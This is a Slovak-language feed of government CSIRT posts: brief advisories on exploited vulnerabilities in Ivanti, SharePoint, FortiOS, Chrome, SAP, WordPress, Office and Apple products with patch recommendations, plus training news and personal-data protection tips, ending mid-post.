Úspešné zneužitie zraniteľností pozorované pri reálnych útokoch umožnilo útočníkom ukradnúť konfiguračné údaje, upraviť súbory a vytvoriť vzdialený tunel zo zariadenia VPN. Útočník tiež vykonal zmeny, aby sa vyhol kontrole integrity systému a pridal zadné vrátka do legitímneho súboru CGI v zariadení. Útočníci môžu získať prístup k citlivým údajom, šíriť škodlivý softvér alebo dokonca prevziať kontrolu nad napadnutým zariadením.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vzdialené vykonávanie kódu
Obídenie bezpečnostných prvkov

Odporúčania:

Zraniteľnosti je možné mitigovať importovaním súboru mitigation.release.20240107.1.xml prostredníctvom portálu na stiahnutie. Konkrétny postup nájdete tu.

Odkazy:

https://thehackernews.com/2024/01/chinese-hackers-exploit-zero-day-flaws.html

https://www.sk-cert.sk/sk/varovanie-pred-kritickymi-zranitelnostami-v-produktoch-od-spolocnosti-ivanti/index.html

https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day

https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

https://www.itnews.com.au/news/ivanti-patches-two-exploited-zero-day-bugs-603958

Aktívne zneužívaná zraniteľnosť v serveri SharePoint

Marian Danko — Sat, 20 Jan 2024 09:49:47 +0000

Aktívne zneužívaná zraniteľnosť v serveri SharePoint

Spoločnosť CISA vydala varovanie pre aktívne zneužívanú zraniteľnosť CVE-2023-29357 v Microsoft SharePoint Server. Spoločnosť Microsoft vydala záplaty na túto chybu v rámci júnových aktualizácií 2023 Patch Tuesday.

Zraniteľné systémy:

Microsoft SharePoint Server 2019

Opis činnosti:

CVE-2023-29357 (CVSS skóre 9,8)

Kritická zraniteľnosť CVE-2023-29357 sa nachádza v serveri SharePoint a týka sa zvýšenia oprávnení. Útočník môže chybu zneužiť odoslaním podvrhnutého autentizačného tokenu JSON Web Token (JWT) na zraniteľný server SharePoint, čo mu umožňuje obchádzať autentifikáciu. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi získať oprávnenie správcu systému.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Eskalácia privilégií

Odporúčania:

Bezodkladná aktualizácia na najnovšiu verziu. Používatelia, ktorí povolili funkciu integrácie AMSI a používajú Microsoft Defender vo svojej farme (farmách) SharePoint Server, sú pred touto zraniteľnosťou chránení.

Odkazy:

https://www.securityweek.com/cisa-urges-patching-of-exploited-sharepoint-server-vulnerability/

https://thehackernews.com/2024/01/act-now-cisa-flags-active-exploitation.html

https://nvd.nist.gov/vuln/detail/CVE-2023-29357

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-29357

Zraniteľnosť vo FortiOS a FortiProxy

Marian Danko — Sat, 20 Jan 2024 09:48:40 +0000

Zraniteľnosť vo FortiOS a FortiProxy

Spoločnosť CISA upozorňuje na vysoko závažnú zraniteľnosť CVE-2023-44250, ktorá umožňuje získať kontrolu nad zraniteľnými systémami.

Zraniteľné systémy:

FortiOS 7.4.0-7.4.1

FortiOS 7.2.5

FortiProxy 7.4.0-7.4.1

Opis činnosti:

CVE-2023-44250 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť CVE-2023-44250 sa nachádza v klastri FortiOS & FortiProxy HA a umožňuje autentifikovanému útočníkovi vykonávať akcie, vykonateľné iba s vysokými oprávneniami, prostredníctvom upravených požiadaviek HTTP alebo HTTPS. Úspešné zneužitie umožňuje získať kontrolu nad zraniteľnými systémami.

Závažnosť zraniteľnosti: Vysoká

Možné škody:

Neoprávnené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia FortiOS/FortiProxy na verziu 7.2.6/ 7.4.2.

Odkazy:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44250

https://www.fortiguard.com/psirt/FG-IR-23-315

https://nvd.nist.gov/vuln/detail/CVE-2023-44250

https://www.tenable.com/plugins/nessus/187809

https://malware.news/t/cisa-warned-of-critical-fortinet-vulnerability-cve-2023-44250-and-issued-a-new-ics-advisory/77451

https://yanac.hu/2024/01/09/cve-2023-44250-fortinet-fortios-fortiproxy-up-to-7-4-1-ha-request-privileges-management-fg-ir-23-315/

Mesačný prehľad kritických zraniteľností december 2023

Marian Danko — Sat, 20 Jan 2024 09:45:09 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci december 2023.

Mesačný prehľad – 12/2023 PDF (260 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Zero-day zraniteľnosť v Google Chrome

Marian Danko — Sat, 20 Jan 2024 09:44:55 +0000

Na zero-day zraniteľnosť poukázali výskumníci Clément Lecigne a Vlad Stolyarov z tímu Google Threat Analysis Group (TAG). Chyba súvisí s pretečením medzipamäte na halde v komponente WebRTC a umožňuje vykonávanie ľubovoľného kódu.

Zraniteľné systémy:

Mozilla
Firefox
Safari
Microsoft Edge
Brave
Opera
Vivaldi
Google Chrome, verzie staršie ako 120.0.6099.129/130 pre Linux, macOS a Windows.

Opis činnosti:

CVE-2023-7024

Zero-day zraniteľnosť CVE-2023-7024 sa týka pretečenia medzipamäte na halde v komponente WebRTC. Úspešné zneužitie môže viesť k pádu aplikácie alebo umožňuje útočníkom vykonávanie ľubovoľného kódu. Na zraniteľnosť poukázali výskumníci Clément Lecigne a Vlad Stolyarov z tímu Google Threat Analysis Group (TAG). Zraniteľnosť je aktívne zneužívaná.

Zraniteľnosť sa pravdepodobne nachádza aj v ostatných prehliadačoch postavených na platforme Chromium.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vykonávanie ľubovoľného kódu
Nedostupnosť aplikácie

Odporúčania:

Bezodkladná aktualizácia prehliadačov na najnovšiu verziu. Odporúčame aktualizovať Google Chrome aspoň na verziu 120.0.6099.129 pre Mac, Linux a 120.0.6099.129/130 pre Windows.

Odkazy:

https://thehackernews.com/2023/12/urgent-new-chrome-zero-day.html

https://www.bleepingcomputer.com/news/security/google-fixes-8th-chrome-zero-day-exploited-in-attacks-this-year/

https://chromereleases.googleblog.com/2023/12/stable-channel-update-for-desktop_20.html

https://securityonline.info/cve-2023-7024-zero-day-vulnerability-threatens-chrome-web-browser/

Vysoko závažná zraniteľnosť v procesoroch AMD

Marian Danko — Sat, 20 Jan 2024 09:44:06 +0000

Spoločnosť Microsoft v rámci balíka opráv Patch Tuesday vydala opravu pre 34 zraniteľností. Oprava sa týkala aj 1 zero-day zraniteľnosti v procesoroch AMD a jej úspešné zneužitie môže viesť k úniku informácií.

Zraniteľné systémy:

AMD EPYC 7001 Procesory
AMD Athlon 3000 Procesory s Radeon Graphics
AMD Ryzen 3000 Procesory s Radeon Graphics
AMD Athlon PRO 3000 Procesory s Radeon Vega Graphics
AMD Ryzen PRO 3000 Procesory s Radeon Vega Graphics

Opis činnosti:

CVE-2023-20588 (CVSS skóre 5,5)

Zero-day zraniteľnosť CVE-2023-20588 sa nachádza v procesoroch AMD. Chyba sa týka delenia nulou, pričom môže procesor vrátiť náhodné dáta. Úspešné zneužitie si vyžaduje lokálny prístup útočníka. Zraniteľnosť objavili Jana Hofmann, Emanuele Vannacci, Cédric Fournet, Boris Köpf, Oleksii Oleksenko z tímu Microsoft Azure Research a Univerzita Vrije v Amsterdame.

Závažnosť zraniteľnosti: Vysoká

Možné škody:

Únik informácií

Odporúčania:

Bezodkladná aktualizácia systému Windows na najnovšiu verziu.

Vývojárom sa odporúča zabezpečiť, aby sa v operáciách delenia nulou nepoužívali žiadne privilegované údaje, resp. dodržiavať best practices vývoja.

Odkazy:

https://www.bleepingcomputer.com/news/microsoft/microsoft-december-2023-patch-tuesday-fixes-34-flaws-1-zero-day/

https://nvd.nist.gov/vuln/detail/CVE-2023-20588

https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-20588

https://www.crowdstrike.com/blog/patch-tuesday-analysis-december-2023/

Kritické zraniteľnosti v produkte SAP Business Technology Platform

Marian Danko — Sat, 20 Jan 2024 09:42:37 +0000

Spoločnosť SAP vydala v decembri 2023 balík opráv pre svoje produkty opravujúcich 15 zraniteľností v Business Technology Platform, 4 z nich sú označené ako kritické. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi eskaláciu privilégií.

Zraniteľné systémy:

SAP Business Technology Platform (BTP) Security Services Integration Libraries verzie staršie ako 3.6.0 (Node.js)
SAP Business Technology Platform (BTP) Security Services Integration Libraries verzie staršie ako 2.17.0 a 3.0-3.3(Java)
SAP Business Technology Platform (BTP) Security Services Integration Libraries verzie staršie ako 4.1.0 (Python)
SAP Business Technology Platform (BTP) Security Services Integration Libraries verzie staršie ako 0.17.0 (Golang)
Cloud Application Programming Model (CAP) JAVA V1 verzie staršie ako 1.34.8
Cloud Application Programming Model (CAP) JAVA V2 verzie staršie ako 2.4.1
SAP Java Buildpack verzie staršie ako 1.81.1
SAP Cloud SDK for Java verzie staršie ako 4.28.0 a 5.0.0
SAP Cloud SDK for Node.js verzie staršie ako 3.9.0
Application Router verzie staršie ako 14.4.3

Opis činnosti:

CVE-2023-49583 (Node.js), CVE-2023-50422 (Java), CVE-2023-50423 (Python), CVE-2023-50424 (Golang)

(CVSS skóre 9,1)

Kritické zraniteľnosti sa nachádzajú v knižniciach BTP Security Sevices Integration Libraries. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi eskaláciu privilégií a získanie prístupu do aplikácie.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Eskalácia privilégií

Odporúčania:

VJ CSIRT odporúča bezodkladnú inštaláciu najnovších bezpečnostných záplat pre SAP Business Technology Platform (BTP) aspoň na verziu 3.6.0 (Node.js), 3.3.0 alebo 2.17.0 (Java), 4.1.0 (Python) a 0.17.0 (Golang).

Podrobné informácie pre mitigáciu nájdete v bezpečnostnej poznámke SAP.

Odkazy:

https://www.securityweek.com/sap-patches-critical-vulnerability-in-business-technology-platform/

https://onapsis.com/blog/sap-patch-day-december-2023

https://blogs.sap.com/2023/12/12/unveiling-critical-security-updates-sap-btp-security-note-3411067/

https://www.cyber.gc.ca/en/alerts-advisories/sap-security-advisory-december-2023-monthly-rollup-av23-756

https://redrays.io/blog/protecting-sap-btp-security-vulnerabilities/

https://nvd.nist.gov/vuln/detail/CVE-2023-50422

https://nvd.nist.gov/vuln/detail/CVE-2023-50423

https://nvd.nist.gov/vuln/detail/CVE-2023-50424

Závažná zraniteľnosť platformy WordPress

Marian Danko — Sat, 20 Jan 2024 09:42:05 +0000

Bezpečnostný tím spoločnosti Fenrisk objavil závažnú zraniteľnosť, ktorá sa nachádza v jadre frameworku WordPress. Úspešné zneužitie umožňuje získať neoprávnený prístup ku webstránkam na platforme WordPress a vzdialené vykonávanie kódu.

Zraniteľné systémy:

WordPress, verzie 6.4 a 6.4.1

Opis činnosti:

Zraniteľnosť sa nachádza v jadre platformy WordPress a umožňuje útočníkovi získať kontrolu nad reťazcom POP (Property-Oriented Programming). Pri úspešnom zreťazení s inými zraniteľnosťami dovoľujúcimi injektovať objekty, napríklad v moduloch alebo témach,môže útočníkovi umožniť vzdialené vykonávanie kódu PHP, mazať súbory alebo získať citlivé údaje. Na chybu poukázal bezpečnostný tím spoločnosti Fenrisk, ktorý zistil problém v triede WP_HTML_Token. Táto trieda bola integrovaná vo verzii 6.4 na zlepšenie rozboru HTML v blokovom editore.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vzdialené vykonávanie kódu
Únik informácií

Odporúčania:

Bezodkladná aktualizácia na najnovšiu verziu 6.4.2.

Odkazy:

https://www.securityweek.com/wordpress-6-4-2-patches-remote-code-execution-vulnerability/

https://thehackernews.com/2023/12/wordpress-releases-update-642-to.html

https://www.bleepingcomputer.com/news/security/wordpress-fixes-pop-chain-exposing-websites-to-rce-attacks/

https://wordpress.org/news/2023/12/wordpress-6-4-2-maintenance-security-release/

Mesačná správa CSIRT.SK – November 2023

Marian Danko — Sat, 20 Jan 2024 09:41:08 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci november 2023. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 11/2023 PDF (345 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Návod: Bezpečné nastavenie prístupu do cloudového prostredia

Marian Danko — Sat, 20 Jan 2024 09:39:36 +0000

CSIRT.SK vydáva odporúčania, ako si nakonfigurujete bezpečné cloudové prostredie, v ktorom hostujete Vaše služby. Dokument popisuje možnosti viacfaktorovej autentifikácie a politiku hesiel, oddelenie účtov s rôznymi oprávneniami, prístupy RBAC a least-privilege, či princíp zero-trust. Zároveň ponúka ďalšie zdroje, ktoré Vám pomôžu pri zabezpečení cloudových platforiem, ktoré používate.

Bezpečné nastavenie prístupu do cloudového prostredia (12-2023)

Členovia VJ CSIRT úspešne absolvovali školenie CyberOps

Marian Danko — Mon, 01 Jan 2024 08:21:58 +0000

Členovia Vládnej jednotky CSIRT (VJ CSIRT) sa zúčastnili školenia CyberOps, ktoré sa uskutočnilo v rámci letnej školy Cisco Networking Academy FIIT STU. Školenie prebiehalo po dobu dvoch mesiacov, s dvomi stretnutiami týždenne v priestoroch laboratórií Kybernetickej bezpečnosti, sieťových technológií a Internetu vecí v budove FIIT STU. Cieľom absolvovania kurzu bolo zvýšenie spôsobilosti členov VJ CSIRT v oblasti kybernetickej bezpečnosti.

Počas dvoch mesiacov naši kolegovia získali skúsenosti vo viacerých oblastiach. Program zahŕňal širokú škálu tém, vrátane etického hackovania, penetračného testovania, bezpečnosti operačných systémov Linux a Windows systémov, zálohy a obnovovania dát, forenznej analýzy a práce s nástrojmi na bezpečnostný monitoring, Security Information and Event Management (SIEM).

Vládna jednotka CSIRT okrem riešení kybernetických bezpečnostných incidentov poskytuje aj preventívne aktivity a penetračné testovanie pre subjekty v gescii sektorového CSIRTu. Práve o penetračnom testovaní webových aplikácií mal prednášku Adam Žilla, s dôrazom na vyhľadávanie a zneužívanie zraniteľností. Adam Žilla je etický hacker a bývalý člen VJ CSIRT. Penetračné testovanie má súvis s etickýcm hackovaním, o ktorom prednášal etický hacker a tvorca blogu Netvel.sk, Matej Šipkovský. Prednáška zahŕňala simuláciu útokov, modus operandi a ich protiopatrenia na zariadeniach spoločnosti Cisco. Členovia technického oddelenia VJ CSIRT získali skúsenosti s používaním nástrojov ako Sysmon a FTK Imager pre detekovanie pokročilých hrozieb, zber dát a forenznú analýzu, vďaka prednáškam od Jana Linharta a bývalej členky VJ CSIRT Evky Markovej. Ján Linhart sa venuje téme Threat Hunting a SOC v spoločnosti Binary Confidence a Evka Marková je študentkou doktorandského štúdia na UPJŠ v Košiciach, a zároveň forenznou analytičkou v spoločnosti ESET. Nadobudnuté znalosti umožňujú bezpečnostným analytikom získať viac dát o logovaní a priebehu incidentu z infikovaného disku. Martin Pavelka, študent doktorandského štúdia na FIIT STU, a Ján Laštinec, vyučujúci na FIIT STU, poskytli informácie o novinkách v oblasti bezpečnosti operačných systémov Windows a Linux vrátane OPRA oprávnení, autentifikácie, firewallu a implementácie adresárových služieb Active Directory. Ako nakonfigurovať firewall, vytvoriť pravidlá pre anomálie v sieti a o detekcií a zabráneniu šírenia útoku pomocou EDR, firewallu a programu Suricata IDS nám povedali Stanislav Stančík, Jakub Koštial a Ján Skalný. Stanislav Stančík a Jakub Koštial sú neoddeliteľnou súčasťou spoločnosti Binary Confidence, Ján Skalný je nezávislý bezpečnostný výskumník SK-CERT. Boris Mittelmann sa posledných 10 rokov venuje ochrane, zálohovaniu a obnove dát o čom mal aj prednášku. Aktuálne pracuje na pozícii Senior Sytem Engineer pre región CEE v spoločnosti Veeam Software. Alexander Valach, doktorand na FIIT STU a člen VJ CSIRT, ktorý sa zameriava na bezpečnostný monitoring, analýzu údajov a automatizáciu, mal prednášku zameranú na bezpečnosť CISCO zariadení a úvod do kybernetickej bezpečnosti. Prednášku o využití bezpečnostného monitoringu pomocou nástroja SIEM pri riešení incidentov mal Radovan Andráš, SOC analytik spoločnosti Binary Confidence.

Okrem prednášok mali účastníci príležitosť riešiť modelový incident v systéme ELK STACK a zúčastniť sa cvičení Capture the Flag na otestovanie svojich zručností v simulovanom kybernetickom útoku, kde ho museli zvládnuť a splniť určité požiadavky pre úspešné ukončenie školenia CyberOps. Cvičenie si pre nich pripravili Radovan Andráš a Alexander Valach.

Všetci zúčastnení členovia VJ CSIRT školenie úspešne zvládli a nadobudli ďalšie poznatky v oblasti boja proti hybridným hrozbám. S historicky najvyšším medziročným nárastom kybernetických útokov za rok 2022 je pravidelná edukácia členov VJ CSIRT nevyhnutnou podmienkou pre zachovanie efektivity ich práce.

Zero-day RCE zraniteľnosť v Microsoft Windows a Office

Marian Danko — Wed, 13 Dec 2023 08:28:52 +0000

Spoločnosť Microsoft opravila v rámci svojho júlového balíka Patch Tuesday aktívne zneužívanú zraniteľnosť systémov Windows a balíka Office, umožňujúcu vzdialené vykonávanie kódu.

Zraniteľné systémy:

Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Word 2013 Service Pack 1 (32-bit editions)
Microsoft Word 2013 Service Pack 1 (64-bit editions)
Microsoft Word 2016 (32-bit edition)
Microsoft Word 2016 (64-bit edition)
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)

Opis činnosti:

CVE-2023-36884 (CVSSv3.1 8,3)

Spoločnosť Microsoft opravila v rámci svojho júlového balíka Patch Tuesday vysoko závažnú aktívne zneužívanú zraniteľnosť, umožňujúcu vzdielane vykonávať kód. Zraniteľnosť útočníci zneužívajú na nasadenie ransomvéru a špionážne aktivity pomocou škodlivých dokumentov MS Office. Pre úspešný útok musí útočník presvedčiť obeť, aby interagovala so škodlivým súborom. Zraniteľnosť sa nachádza v komponente HTML v systémoch Windows a balíku Office.

Pozorované boli cielené útoky proruskej skupiny Storm-0978 v rámci spear-phishingových kampaní najmä na organizácie spojené s pomocou Ukrajine.

Závažnosť zraniteľnosti: Vysoká

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná inštalácia júlového balíka PatchTuesday.

Ak inštalácia aktualizácie nie je možná, Microsoft vydal odporúčania pre mitigovanie zraniteľnosti použitím MS Defender for Office, blokovaním vytvárania detských procesov pre aplikácie MS Office, či vytvorením kľúča v registroch.

Odkazy:

https://blog.cyble.com/2023/07/12/microsoft-zero-day-vulnerability-cve-2023-36884-being-actively-exploited/

https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884

Apple rapídna bezpečnostná odpoveď na nové zero-day zraniteľnosti

Marian Danko — Wed, 13 Dec 2023 08:23:48 +0000

Bezpečnostní výskumníci objavili tri zero-day zraniteľnosti zariadení spoločnosti Apple, ktoré útočníci používajú na sledovanie a zbieranie citlivých údajov zo zariadení iPhone, Mac a iPad. Spoločnosť Apple preto vydáva novú aktualizáciu zabezpečenia svojich zariadení formou nedávno spustenej služby rapídna bezpečnostná odpoveď (RSR).

Zraniteľné systémy:

Zraniteľnosť ovplyvňuje celý rad produktov, vrátane mnohých, ktoré spoločnosť Apple, označuje ako produkty na konci svojej technickej životnosti, menovite sú to tieto zariadenia.

iPhone 6s ( všetky modely ), iPhone 7 ( všetky modely ), iPhone SE ( 1. generácia ), iPhone 8 a novšie

iPod touch ( 7. generácia ),

iPad Pro ( všetky modely ), iPad Air 3. generácia a novšia, iPad 5. generácia a novšia, iPad Air 2, iPad mini ( 4. generácia ), iPad mini 5. generácia a novšie,

Mac počítače s operačným systémom MacOS Big Sur, Monterey a Ventura

Apple Watch Series 4 a novšie

Apple TV 4K ( všetky modely ) a Apple TV HD

Opis činnosti:

CVE-2023-32409

Prvá zraniteľnosť v renderovacom jadre WebKit, umožňuje potenciálnemu útočníkovi sa dostať z karantény (sandbox) takzvaného Web Content, a inštalovať škodlivý kód ako napríklad spyware.

CVE-2023-28204

Táto zraniteľnosť umožňuje čítanie mimo hraníc a mohla by umožniť vzdialenému útočníkovi získať citlivé informácie.

CVE-2023-32373

Ďalšou zraniteľnosťou vo WebKit-e môže útočník vzdialene vykonať kód pri spracovaní dát, alebo návšteve špeciálne vytvoreného škodlivého webu. Jedná sa o chybu umožňujúcu použitie dealokovanej časti pamäte.

Spoločnosť Apple nezverejnila žiadne ďalšie technické podrobnosti k bezpečnostným problémom a objaveným hrozbám. Prvú spomínanú zraniteľnosť CVE-2023-32409 objavili Clément Lecigne zo skupiny Google pre analýzu hrozieb a Donncha Ó Cearbhaill z bezpečnostného laboratória Amnesty International. Povaha chýb naznačuje, že už mohli byť zneužité napríklad na šírenie spywaru štátom sponzorovanými útočníkmi, ktorí takto sledujú rôzne ciele ako disidentov, aktivistov za ľudské práva a podobne.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vykonávanie kódu
Únik a zneužitie citlivých dát
Eskalácia oprávnení

Odporúčania:

Spoločnosť Apple od mája tohto roku spúšťa službu rýchlej bezpečnostnej reakcie (v skratke RSR), ktorá ako názov naznačuje, je malá záplata, ktorá rýchlejšie opravuje aktívne zraniteľnosti zneužívané pri útokoch.

Odporúčame bezodkladnú aktualizáciu systémov macOS Ventura na verziu 13.4, iOS a iPadOS na verziu 15.7.6 a 16.5, tvOS na 16.5, watchOS na 9.5 a prehliadača Safari na verziu 16.5.

Ak zariadenie pripojené na internet samo neupozorní na dostupnú neodkladnú rýchlu bezpečnostnú záplatu, odporúčame skontrolovať jej dostupnosť nasledovne:

Na zariadeniach iPhone alebo iPad: Prejdite do Nastavenia > Všeobecné > Aktualizácia softvéru > Automatické aktualizácie, potom sa uistite, že sú zapnuté > Bezpečnostné odpovede a systémové súbory.

Pre počítače s MacOSx: Vyberte ponuku Apple > Nastavenia systému. Kliknite na položku Všeobecné na bočnom paneli a potom na položku > Aktualizácia softvéru, ktorá je vpravo. Kliknite na tlačidlo Zobraziť podrobnosti vedľa automatických aktualizácií a potom sa uistite, že je zapnutá možnosť Inštalovať bezpečnostné odpovede a systémové súbory.

Odkazy:

https://www.bleepingcomputer.com/news/apple/apple-fixes-three-new-zero-days-exploited-to-hack-iphones-macs/

https://thehackernews.com/2023/05/webkit-under-attack-apple-issues.html

https://appleinsider.com/articles/23/05/18/apples-latest-ios-ipados-macos-updates-fixed-an-actively-used-exploit

https://support.apple.com/en-us/HT213758

https://support.apple.com/en-us/HT213757

Buď múdrejší ako hacker- osobné údaje #4

Marian Danko — Thu, 30 Nov 2023 08:40:20 +0000

Október je mesiacom kybernetickej bezpečnosti, kedy sa zvyšuje povedomie o dôležitosti bezpečnosti a ochrane osobných údajov. Osobnými údajmi sa rozumejú všetky informácie, ktoré možno použiť na identifikáciu jednotlivca, napríklad meno, adresa, telefónne číslo, e-mailová adresa a ďalšie (týždeň 1). Kyberútočnící používajú na zhromažďovanie osobných údajov rôzne metódy vrátane phishingu, malvéru, sociálneho inžinierstva a ďalších (týždeň 2). Keď získajú prístup k osobným údajom, môžu ich použiť na krádež identity, finančné podvody a iné nekalé činnosti (týždeň 3). Preto je veľmi dôležité chrániť osobné údaje pred kybernetickými hrozbami.

Pripravili sme pre Vás desatoro odporúčaní, ktoré vám pomôžu ochrániť vaše osobné údaje:

Nevyžiadané správy: Buďte ostražití pri prijímaní e-mailov, telefónnych hovorov alebo správ od neznámych zdrojov, najmä ak tieto zdroje žiadajú o osobné alebo citlivé informácie. V prípade pochybností kontaktujte príslušnú osobu, organizáciu alebo ich overte. Pomocou online nástroja, dokážete overiť dôveryhodnosť emailovej adresy.
Identita: Dajte si pozor na zdieľanie citlivých fotografií, dokladov alebo informácií na internete. Útočník ich dokáže zneužiť pre vytvorenie falošného profilu a tým získať dôveryhodnosť. Pomocou nástrojov Google, Bing, Yandex alebo oficiálnych stránok dokážete zistiť identitu z fotografie a základných informácií.
Naliehanie: Buďte opatrní voči správam, ktoré vytvárajú pocit naliehavosti alebo strachu. Útočníci často využívajú taktiky na to, aby ľudí manipulovali do rýchlych a nepremyslených rozhodnutí. Viac o technikách sociálneho inžinierstva.
Sociálne siete: Upravte svoje profily na sociálnych sieťach na súkromné a dávajte pozor na informácie, ktoré zdieľate online. Dokážete tak predísť získaniu osobných dát útočníkom.
Aktualizácia a antivírus: Pravidelné aktualizácie softvéru a používanie antivírusového softvéru sú kľúčovými pre ochranu pred malvérom a inými typmi útokov. Pokiaľ nemáte zakúpený antivírus, odporúčame mať aspoň zapnutý a nakonfigurovaný Microsoft Defender spoločne s firewallom.
Edukácia: Buďte dobre informovaní o závažných zraniteľnostiach, taktikách útočníkov a naučte sa ich rozpoznávať a predchádzať im. Poskytovanie vzdelávania zamestnancom je kľúčové pre ochranu celej organizácie. Napríklad pravidelné sledovanie zraniteľností ,ktoré sú zverejňované na stránke VJ CSIRT.
2FA: Povoliť dvojfaktorovú autentifikáciu (2FA) pre svoje účty všade, keď je to možné. Týmto spôsobom sa pridáva dodatočná úroveň zabezpečenia Vášho konta. Najlepšie aplikácie pre autentifikáciu.
Heslá: Používajte silné a jedinečné heslá pre všetky svoje účty, najmä pre administratívne a redakčné účty. Zvážte použitie manažéra hesiel na bezpečné generovanie a uchovávanie hesiel.
Zálohovanie: Pravidelne zálohujte svoje dáta na bezpečné miesto, ako je externý pevný disk alebo cloudová úložná služba. Toto Vám môže pomôcť obnoviť vaše údaje v prípade ransomware útoku alebo inej straty.
VPN a verejné WIFI: Pri používaní verejných sietí Wi-Fi sa odporúča používať sieť VPN na ochranu vášho súkromia a bezpečnosti. Sieť VPN vytvára bezpečné a šifrované pripojenie k sieti. Vyhnite sa používaniu verejných Wi-Fi sietí na prenos citlivých informácií, ako sú heslá, bankové údaje a osobné údaje.

Používateľ sociálnych sietí by mal obmedziť množstvo zdieľaných osobných informácií. Je dôležité byť si týchto rizík vedomý a prijať kroky na svoju ochranu. Týmito opatreniami môžete chrániť samých seba a svojich najbližších pred útočníkmi, ktorí sa snažia zneužiť Vaše osobné údaje na útok proti Vám. Dodržiavanie bezpečnostných odporúčaní pomôže minimalizovať riziko, že sa stanete obeťou útokov. Vždy pamätajte, že prevencia je najlepšou ochranou pred kybernetickými hrozbami ! Ako prevenciu môžete použiť aj online nástroj na vyhľadávanie Vašich prihlasovacích údajov v online databázach uniknutých dát. Alebo pravidelne využívať stránku na skenovanie súborov, URL, domén, overovanie zdrojov pre získanie viacerých informácií.

Pripravili sme si pre Vás krátky phishingový test, kde si môžete na praktických príkladoch overiť svoje znalosti. Phishingový test: https://www.csirt.gov.sk/archiv/osvedcene-postupy/navody-a-odporucania/phishingovy-test-871.html?csrt=6113910499060114075

Buď múdrejší ako hacker- osobné údaje #3

Marian Danko — Mon, 20 Nov 2023 08:38:44 +0000

Zneužitie osobných údajov je stále častejším problémom v bežnom živote ľudí. Útočníci sa snažia využiť rôzne sofistikované metódy, vrátane web scrapingu a sociálneho inžinierstva, na získanie citlivých údajov obetí a ich následné zneužitie. Tieto údaje môžu zahŕňať osobné informácie, telefónne čísla, bankové údaje a oveľa viac. V nasledujúcom texte sa pozrieme na to, ako by útočník mohol získať a zneužiť tieto údaje v rôznych situáciách.

Telefón + Banková karta:

Útočník by mohol pomocou kombinácie web scrapingu a sociálneho inžinierstva získať osobné údaje, vrátane telefónneho čísla a údajov z bankovej karty. Existujú automatizované nástroje na web scraping, ktoré prehľadávajú verejne dostupné online zdroje (sociálne siete, fóra, web stránky..) a zbierajú z nich osobné údaje.

Na základe získaných dát dokáže útočník využiť taktiky sociálneho inžinierstva za účelom nadobudnutia konkrétnych údajov, ako sú telefónne číslo, číslo bankovej karty a podobne. Po získaní telefónneho čísla a údajov z bankovej karty by útočník mohol tieto informácie zneužiť na neoprávnené transakcie alebo finančné podvody. V prípade, že získa prístup k bankovým údajom, môže sa pokúsiť vykonať transakcie na účte obete a následne obeť kontaktovať telefonicky s cieľom získať ďalšie informácie, ktoré mu pomôžu s finančnými podvodmi.

Krádež účtu:

